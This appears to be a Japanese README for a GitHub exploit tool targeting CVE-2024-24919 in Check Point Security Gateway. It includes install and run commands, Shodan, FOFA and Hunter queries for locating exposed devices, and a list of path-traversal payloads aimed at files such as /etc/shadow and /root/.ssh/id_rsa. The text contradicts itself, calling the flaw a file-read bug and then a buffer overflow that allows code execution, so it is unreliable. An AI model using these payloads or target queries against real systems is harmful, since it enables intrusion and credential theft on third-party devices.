
CVE-2024-24919 エクスプロイト
このリポジトリには、Check Point Security GatewayのCVE-2024-24919脆弱性を悪用するためのツールが含まれています。このツールは、脆弱なデバイスを識別できるマルチスキャナーと、影響を受けるデバイスを完全に制御できる単一ターゲットエクスプロイトです。
CVE-2024-24919は、攻撃者がCheck Point Security Gateway上の任意のファイルをリモートで読み取ることを可能にする、重大度の高い情報漏えい脆弱性です。この脆弱性は、パスワードや設定ファイルなどの機密情報を盗むために悪用される可能性があります。
免責事項:
このツールは教育目的のみで提供されています。所有者の明示的な同意なしに、脆弱なシステムを攻撃するために使用してはなりません。このツールの作者は、その使用によって生じたいかなる損害についても責任を負いません。
このエクスプロイトは、特別に細工されたHTTPリクエストを脆弱なデバイスに送信することで動作します。このリクエストはデバイスのファームウェアにバッファオーバーフローを引き起こし、攻撃者が任意のコードを実行できるようにします。その後、このエクスプロイトを使用してデバイスの完全な制御を取得できます。
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
単一ターゲットまたは複数ターゲットをスキャンできます!
python cve-2024-24919.py
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"

$ ツールのパス : ```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```